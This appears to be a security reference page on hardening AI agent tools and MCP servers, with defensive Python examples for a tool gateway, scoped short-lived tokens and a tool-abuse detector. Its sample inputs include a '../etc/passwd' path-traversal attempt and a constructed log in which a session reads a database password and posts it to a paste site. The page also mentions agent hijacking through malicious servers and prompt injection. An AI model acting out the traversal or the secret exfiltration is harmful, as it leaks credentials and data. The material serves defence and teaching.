Execution & Tools
Tools / MCP
Tools and MCP servers: the external capabilities (APIs, functions, systems) the agent can call.
Plane
Execution & Tools
Flow steps
7
Frameworks
OWASP LLM06 · NIST 800-53 · MITRE ATLAS
Technology
Why use it
Give the agent concrete capabilities (read, write, call systems) in a standardized way (MCP).
Why it matters to security
Each tool widens the attack surface and the agent’s power: authentication, least privilege and I/O validation are mandatory.
Implementations: Model Context Protocol (MCP) · plugins / function calling · tool gateways
Every tool given to an agent is a delegation of power: grant it sparingly.
Recommendations by maturity tier
Foundation
Minimum viable baseline
- Tools authenticated with their own identity (NIST 800-53 IA-9). A tool/MCP server authenticates itself; it is not implicitly trusted.
- Least privilege per tool (NIST 800-53 AC-6 · OWASP LLM06:2025). A tool gets only the scope its function needs.
- Tool input and output validation (NIST 800-53 SI-10). Tool parameters and results are untrusted data.
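The three Foundation controls, applied at one enforcement point in front of every tool call. This is an added example, not code from the page or from any MCP implementation: tool identity is modelled as a per-tool secret checked in constant time (a real deployment would use mTLS or a workload identity), and the `files` tool, its credential and the in-memory sample filesystem are constructed for the example.

```python
"""Minimal tool gateway: tool identity, least privilege, input/output validation.

Added example, not the page's own code. The 'files' tool, FILES_CRED and
SAMPLE_FS are constructed; a real gateway would authenticate the MCP server
with mTLS or a workload identity rather than a shared secret.
"""
from __future__ import annotations

import hmac
import re
from dataclasses import dataclass
from typing import Any, Callable


class ToolError(Exception):
    """Raised when a call fails an authentication, scope or validation check."""


@dataclass(frozen=True)
class ToolSpec:
    name: str
    credential: bytes                           # the tool's own identity (IA-9)
    scopes: frozenset[str]                      # only what its function needs (AC-6)
    params: dict[str, tuple[type, str | None]]  # name -> (type, format regex) (SI-10)
    handler: Callable[..., Any]


class ToolGateway:
    """Enforcement point in front of every tool the agent may call."""

    def __init__(self, max_output_chars: int = 200) -> None:
        self._tools: dict[str, ToolSpec] = {}
        self.max_output_chars = max_output_chars

    def register(self, spec: ToolSpec) -> None:
        self._tools[spec.name] = spec

    def call(self, name: str, presented: bytes, scope: str, **params: Any) -> str:
        spec = self._tools.get(name)
        # 1. The tool must prove its identity; its name alone is not trusted.
        if spec is None or not hmac.compare_digest(spec.credential, presented):
            raise ToolError(f"tool {name!r}: authentication failed")
        # 2. Least privilege: the requested scope must be one the tool was granted.
        if scope not in spec.scopes:
            raise ToolError(f"tool {name!r}: scope {scope!r} not granted")
        # 3a. Inputs are untrusted: exact parameter set, type and format.
        self._validate_params(spec, params)
        result = spec.handler(**params)
        # 3b. Outputs are untrusted: bounded in size, control characters
        #     stripped, and labelled as data before they reach the model.
        return self._sanitize_output(name, result)

    @staticmethod
    def _validate_params(spec: ToolSpec, params: dict[str, Any]) -> None:
        if set(params) != set(spec.params):
            raise ToolError(f"tool {spec.name!r}: parameter set mismatch")
        for key, (typ, pattern) in spec.params.items():
            value = params[key]
            if type(value) is not typ:
                raise ToolError(f"param {key!r}: expected {typ.__name__}")
            if pattern is not None and not re.fullmatch(pattern, value):
                raise ToolError(f"param {key!r}: value rejected by format check")

    def _sanitize_output(self, name: str, result: Any) -> str:
        if not isinstance(result, str):
            raise ToolError(f"tool {name!r}: non-string result refused")
        cleaned = "".join(ch for ch in result if ch in "\n\t" or ch.isprintable())
        if len(cleaned) > self.max_output_chars:
            cleaned = cleaned[: self.max_output_chars] + "\n[truncated]"
        return f"[tool:{name} result]\n{cleaned}\n[/tool:{name} result]"


# --- constructed sample tool: read-only access to an in-memory file tree ----
SAMPLE_FS = {"notes/todo.txt": "buy milk\n", "notes/long.txt": "A" * 500}
FILES_CRED = b"files-tool-secret-0123456789abcdef"      # assumed per-tool credential
SAFE_PATH = r"(?!/)(?!.*\.\.)[\w./-]+"                   # relative, no '..' components


def read_file(path: str) -> str:
    if path not in SAMPLE_FS:
        raise ToolError(f"no such file: {path}")
    return SAMPLE_FS[path]


def build_gateway() -> ToolGateway:
    gw = ToolGateway(max_output_chars=200)
    gw.register(ToolSpec(
        name="files",
        credential=FILES_CRED,
        scopes=frozenset({"files:read"}),      # deliberately no files:write
        params={"path": (str, SAFE_PATH)},
        handler=read_file,
    ))
    return gw


def try_call(gw: ToolGateway, *args: Any, **kwargs: Any) -> str:
    """Return the sanitized result, or 'DENIED: <reason>' when a check fails."""
    try:
        return gw.call(*args, **kwargs)
    except ToolError as exc:
        return f"DENIED: {exc}"


if __name__ == "__main__":
    gw = build_gateway()
    print(try_call(gw, "files", FILES_CRED, "files:read", path="notes/todo.txt"))
    print(try_call(gw, "files", b"wrong", "files:read", path="notes/todo.txt"))
    print(try_call(gw, "files", FILES_CRED, "files:write", path="notes/todo.txt"))
    print(try_call(gw, "files", FILES_CRED, "files:read", path="../etc/passwd"))
    print(try_call(gw, "files", FILES_CRED, "files:read", path="notes/long.txt"))
```

The ordering matters: identity is checked before scope, and scope before parameters, so an unauthenticated or over-privileged caller learns nothing about which parameter values the tool would accept. The output wrapper only labels the result as data; it does not make the result safe to obey, which is why the Advanced tier adds abuse detection on top.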
Enterprise
Enterprise standard
- Allow-list of approved tools and MCP servers (NIST 800-53 CM-7 · AC-3). Only vetted tools are available to the agent.
- Tool tokens with minimal scope and lifetime (NIST 800-53 AC-6 · IA-5). A compromised tool has reduced power and a reduced window.
- MCP server provenance verification (NIST 800-53 SR-4 · OWASP LLM03:2025). A third-party MCP server is a supply-chain component.
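The three Enterprise controls together: an allow-list that pins each MCP server to a provenance digest, and a token minter that refuses to issue anything beyond the allow-listed scopes or beyond a short lifetime. Added example, not the page's or any MCP project's code. Provenance is reduced to a SHA-256 pin of the server artifact (a real pipeline verifies a signed attestation, for example SLSA provenance); the server name, artifact bytes and gateway signing key are constructed.

```python
"""Allow-listed MCP servers with pinned provenance and short-lived scoped tokens.

Added example, not the page's own code. VETTED_ARTIFACT, ALLOWED_SERVERS and
GATEWAY_KEY are constructed; the digest pin stands in for a signed attestation.
"""
import base64
import hashlib
import hmac
import json


class ToolAuthError(Exception):
    """Raised when a server is not allow-listed or a token fails a check."""


# Constructed bytes standing in for the vetted MCP server build.
VETTED_ARTIFACT = b"corp-jira-mcp 1.4.2 (constructed artifact bytes for the example)"

# Allow-list (CM-7 / AC-3): name -> provenance pin (SR-4) and the maximum
# scopes this server may ever be issued (AC-6).
ALLOWED_SERVERS = {
    "corp-jira-mcp": {
        "sha256": hashlib.sha256(VETTED_ARTIFACT).hexdigest(),
        "scopes": frozenset({"jira:read"}),
    },
}
MAX_TTL_S = 900                                           # 15 minutes (IA-5)
GATEWAY_KEY = b"gateway-token-signing-key-constructed"   # assumed; keep in a KMS


def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def verify_provenance(name: str, artifact: bytes) -> bool:
    """True only if the server is allow-listed and its artifact matches the pin."""
    entry = ALLOWED_SERVERS.get(name)
    if entry is None:
        return False
    return hmac.compare_digest(hashlib.sha256(artifact).hexdigest(), entry["sha256"])


def mint_tool_token(name: str, artifact: bytes, scopes: set, ttl_s: int, now: int) -> str:
    """Issue an HMAC-signed token bound to one server, a scope subset and an expiry."""
    if not verify_provenance(name, artifact):
        raise ToolAuthError(f"{name}: not allow-listed or provenance mismatch")
    if not set(scopes) <= ALLOWED_SERVERS[name]["scopes"]:
        raise ToolAuthError(f"{name}: requested scopes exceed allow-list")
    if not 0 < ttl_s <= MAX_TTL_S:
        raise ToolAuthError(f"{name}: ttl must be within 1..{MAX_TTL_S}s")
    payload = {"sub": name, "scope": sorted(scopes), "iat": now, "exp": now + ttl_s}
    body = _b64(json.dumps(payload, sort_keys=True, separators=(",", ":")).encode())
    sig = _b64(hmac.new(GATEWAY_KEY, body.encode(), hashlib.sha256).digest())
    return f"{body}.{sig}"


def verify_tool_token(token: str, required_scope: str, now: int) -> dict:
    """Check signature, expiry, continued allow-listing and scope; return the claims."""
    body, _, sig = token.partition(".")
    expected = _b64(hmac.new(GATEWAY_KEY, body.encode(), hashlib.sha256).digest())
    if not hmac.compare_digest(expected.encode(), sig.encode()):
        raise ToolAuthError("token signature invalid")
    payload = json.loads(_unb64(body))
    if now >= payload["exp"]:
        raise ToolAuthError("token expired")
    if payload["sub"] not in ALLOWED_SERVERS:          # revocation by de-listing
        raise ToolAuthError("server removed from allow-list")
    if required_scope not in payload["scope"]:
        raise ToolAuthError(f"scope {required_scope!r} not in token")
    return payload


def try_mint(name: str, artifact: bytes, scopes: set, ttl_s: int, now: int) -> str:
    try:
        return mint_tool_token(name, artifact, scopes, ttl_s, now)
    except ToolAuthError as exc:
        return f"DENIED: {exc}"


def check(token: str, required_scope: str, now: int) -> str:
    try:
        verify_tool_token(token, required_scope, now)
        return "OK"
    except ToolAuthError as exc:
        return f"DENIED: {exc}"


if __name__ == "__main__":
    t0 = 1_700_000_000
    tok = mint_tool_token("corp-jira-mcp", VETTED_ARTIFACT, {"jira:read"}, 300, t0)
    print(check(tok, "jira:read", t0 + 100))     # accepted
    print(check(tok, "jira:write", t0 + 100))    # scope never issued
    print(check(tok, "jira:read", t0 + 400))     # expired after 300 s
    print(try_mint("corp-jira-mcp", b"tampered build", {"jira:read"}, 300, t0))
```

Note that the verifier re-checks the allow-list at use time, so de-listing a server revokes its outstanding tokens immediately rather than at expiry; the short TTL then limits how long a token stolen from a still-listed server remains usable.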
Advanced
High-assurance / regulated
- Tool-call authorization decided by the PDP (NIST 800-53 AC-24). Access to a tool depends on context and risk.
- Tool-abuse detection by frequency and sequence (NIST 800-53 SI-4). Anomalous tool usage is flagged and contained.
- Per-tool execution isolation (NIST 800-53 SC-39). A compromised tool does not contaminate the others.
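Tool-abuse detection over a tool-call log, showing both signals the Advanced tier names: a frequency rule (too many calls of one tool in a sliding window) and a sequence rule (a secret read followed shortly by an outbound send to a host outside the allow-list), with the affected sessions returned for containment. Added example, not the page's own code; the log line format, thresholds, tool names and the log itself are constructed.

```python
"""Tool-abuse detection: frequency and sequence rules over a tool-call log.

Added example, not the page's own code. SAMPLE_LOG, the line format, the
thresholds and the tool names are all constructed for the example.
"""
import re
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta
from urllib.parse import urlparse

LINE_RE = re.compile(r"(?P<ts>\S+) session=(?P<session>\S+) tool=(?P<tool>\S+) args=(?P<args>.*)")

FREQ_LIMIT = 10                          # more than this per tool per window is a burst
FREQ_WINDOW = timedelta(seconds=60)
SEQ_WINDOW = timedelta(seconds=60)       # secret read -> outbound send within this
SENSITIVE_READS = {"secrets.get"}
OUTBOUND_SENDS = {"http.post"}
ALLOWED_HOSTS = {"api.example.com"}      # assumed egress allow-list


@dataclass(frozen=True)
class Call:
    ts: datetime
    session: str
    tool: str
    args: dict


@dataclass(frozen=True)
class Alert:
    rule: str
    session: str
    detail: str


def parse_log(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.fullmatch(line.strip())
        if not m:
            continue                      # unparseable lines are skipped, not trusted
        args = dict(kv.split("=", 1) for kv in m["args"].split() if "=" in kv)
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        calls.append(Call(ts, m["session"], m["tool"], args))
    return calls


def detect(calls: list) -> list:
    alerts = []
    recent = defaultdict(deque)           # (session, tool) -> timestamps in window
    flagged = set()                       # one frequency alert per (session, tool)
    last_secret = {}                      # session -> time of last sensitive read
    for c in sorted(calls, key=lambda c: c.ts):
        key = (c.session, c.tool)
        window = recent[key]
        window.append(c.ts)
        while window and c.ts - window[0] > FREQ_WINDOW:
            window.popleft()
        if len(window) > FREQ_LIMIT and key not in flagged:
            flagged.add(key)
            alerts.append(Alert("frequency", c.session,
                                f"{c.tool} called {len(window)} times in {FREQ_WINDOW.seconds}s"))
        if c.tool in SENSITIVE_READS:
            last_secret[c.session] = c.ts
        elif c.tool in OUTBOUND_SENDS:
            host = urlparse(c.args.get("url", "")).hostname or ""
            seen = last_secret.get(c.session)
            if seen is not None and c.ts - seen <= SEQ_WINDOW and host not in ALLOWED_HOSTS:
                alerts.append(Alert("sequence", c.session,
                                    f"secret read then {c.tool} to {host}"))
    return alerts


def sessions_to_contain(alerts: list) -> set:
    """Sessions whose tool access should be suspended pending review."""
    return {a.session for a in alerts}


# Constructed log: s1 is benign, s2 exfiltrates a secret, s3 bursts, s4 sends to an allowed host.
SAMPLE_LOG = "\n".join(
    [
        "2025-03-01T10:00:00Z session=s1 tool=files.read args=path=notes/todo.txt",
        "2025-03-01T10:00:05Z session=s1 tool=http.post args=url=https://api.example.com/tickets",
        "2025-03-01T10:01:00Z session=s2 tool=secrets.get args=name=db-password",
        "2025-03-01T10:01:07Z session=s2 tool=http.post args=url=https://paste.example.net/upload",
    ]
    + [f"2025-03-01T10:02:{i:02d}Z session=s3 tool=files.read args=path=docs/{i}.txt" for i in range(12)]
    + [
        "2025-03-01T10:03:00Z session=s4 tool=secrets.get args=name=api-key",
        "2025-03-01T10:03:02Z session=s4 tool=http.post args=url=https://api.example.com/auth",
    ]
)

if __name__ == "__main__":
    found = detect(parse_log(SAMPLE_LOG))
    for a in found:
        print(f"{a.rule:9} session={a.session} {a.detail}")
    print("contain:", sorted(sessions_to_contain(found)))
```

The sequence rule is what distinguishes tool-abuse detection from plain rate limiting: each call in s2 is individually permitted, and only the ordering and timing across tools reveal the exfiltration. Feeding `sessions_to_contain` back to the PDP as a risk attribute is how the "flagged and contained" half of the control is closed.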
Architecture notes
- Beware third-party MCP servers. A malicious tool can hijack the agent or exfiltrate its data. Validate their provenance, isolate their execution and strictly bound their scope.
References
OWASP LLM06:2025
Excessive Agency — tools are the direct vector of an agent’s power.
NIST SP 800-53 Rev5
IA-9 (Service Identification and Authentication), AC-6 (Least Privilege), AC-3 (Access Enforcement), AC-24 (Access Control Decisions), SI-10 (Information Input Validation), CM-7 (Least Functionality), SR-4 (Provenance), SC-39 (Process Isolation), IA-5 (Authenticator Management), SI-4 (System Monitoring).
MITRE ATLAS — AML.T0051
Tool hijacking via prompt injection.
Abbreviations
PDP
Policy Decision Point
PEP
Policy Enforcement Point
PIP
Policy Information Point
PAP
Policy Administration Point
IdP
Identity Provider
TSS
Token Service
NHI
Non-Human Identity
RBAC
Role-Based Access Control
ABAC
Attribute-Based Access Control
MFA
Multi-Factor Authentication
HITL
Human-in-the-loop
JIT
Just-In-Time
CAE
Continuous Access Evaluation
CAEP
Continuous Access Evaluation Profile
DPoP
Demonstrating Proof-of-Possession
mTLS
mutual TLS
PII
Personally Identifiable Information
KMS
Key Management Service
CI/CD
Continuous Integration / Continuous Delivery
SIEM
Security Information and Event Management
SOAR
Security Orchestration, Automation and Response
SCIM
System for Cross-domain Identity Management
XACML
eXtensible Access Control Markup Language
OPA
Open Policy Agent
OWASP
Open Worldwide Application Security Project
NIST
National Institute of Standards and Technology
ATLAS
Adversarial Threat Landscape for Artificial-Intelligence Systems
LLM
Large Language Model
WAF
Web Application Firewall
CDN
Content Delivery Network
DDoS
Distributed Denial of Service
DLP
Data Loss Prevention
JWT
JSON Web Token
API
Application Programming Interface
CRS
Core Rule Set (OWASP)
RAG
Retrieval-Augmented Generation
MCP
Model Context Protocol
PBAC
Permission-Based Access Control
HSM
Hardware Security Module
UEBA
User and Entity Behavior Analytics
SBOM
Software Bill of Materials
SLSA
Supply-chain Levels for Software Artifacts
WORM
Write Once, Read Many
SPIFFE
Secure Production Identity Framework For Everyone